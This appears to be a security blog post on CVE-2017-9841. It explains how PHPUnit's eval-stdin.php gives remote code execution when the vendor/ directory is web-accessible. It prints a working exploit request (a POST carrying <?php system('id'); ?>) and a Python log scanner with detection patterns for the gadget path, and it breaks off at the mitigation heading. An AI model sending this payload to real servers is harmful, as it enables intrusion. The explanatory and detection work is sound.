vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: CVE-2017-9841 and web-accessible vendor directories

The file vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php is a perfect storm: a unit testing utility, a missing --no-dev flag, and a web-accessible vendor directory. CVE-2017-9841 turned two lines of code into a universal RCE gadget for hundreds of thousands of applications.

As a developer, the lesson is simple: treat your vendor/ directory like a loaded weapon in production. Never routable, never directly accessible. As a security professional, never underestimate the power of simple file existence checks—sometimes the smallest file delivers the biggest breach.


The primary condition for this vulnerability to be exploitable is that the vendor directory must be web-accessible: the request below only works if the web server will route a URL straight to a file under vendor/.

Attack Scenario:

Example Exploit Request:

POST /vendor/phpunit/phpunit/src/util/php/eval-stdin.php HTTP/1.1
Host: target.com
Content-Length: 23

<?php system('id'); ?>

If successful, the server executes system('id') and returns the output, which shows the account the web server process runs as (e.g., www-data) and confirms that the attacker can run arbitrary code on the server.
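The detection side of the scenario above, as an added example that is not part of the original post: a small access-log scanner that flags requests reaching eval-stdin.php (including lowercase and URL-encoded spellings of the path) and, more generally, any request under vendor/ that the server answered successfully, which is the misconfiguration the whole attack depends on. The log format and the sample lines are assumptions constructed for the example.

```python
"""Flag access-log lines that reach the PHPUnit eval-stdin.php gadget
(CVE-2017-9841) or show that vendor/ is being served at all."""
import re
from urllib.parse import unquote

# Common Apache/nginx log layout: client - - [time] "METHOD PATH PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Case-insensitive: Windows/macOS hosts serve Util/PHP and util/php alike
EVAL_STDIN = re.compile(r'/vendor/phpunit/phpunit/src/util/php/eval-stdin\.php$', re.I)
VENDOR_DIR = re.compile(r'/vendor/', re.I)

def classify(line):
    """Return (severity, reason, client, path, status) or None if uninteresting."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _ts, method, raw_path, status, _size = m.groups()
    # Drop the query string and decode %xx escapes before matching the path
    path = unquote(raw_path.split('?', 1)[0])
    if EVAL_STDIN.search(path):
        # A 200 on a POST means the body was handed to eval(); anything else is a probe
        sev = 'critical' if method == 'POST' and status == '200' else 'high'
        return (sev, 'phpunit eval-stdin.php reached', client, path, status)
    if VENDOR_DIR.search(path) and status.startswith('2'):
        return ('medium', 'vendor/ path served: directory is routable', client, path, status)
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in (classify(l) for l in lines) if f]

# Constructed sample log (not from a real server): a successful POST, a 404 probe,
# a URL-encoded probe with a query string, a served vendor/ file, and benign traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "POST /vendor/phpunit/phpunit/src/util/php/eval-stdin.php HTTP/1.1" 200 57',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval%2Dstdin.php?x=1 HTTP/1.1" 403 0',
    '198.51.100.7 - - [10/Oct/2023:13:56:05 +0000] "GET /vendor/autoload.php HTTP/1.1" 200 0',
    '192.0.2.9 - - [10/Oct/2023:13:57:00 +0000] "GET /index.php HTTP/1.1" 200 2048',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

The medium finding is the one to act on first: a 2xx for anything under vendor/ means the directory is routable, which is the precondition the post describes.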

To mitigate such vulnerabilities:
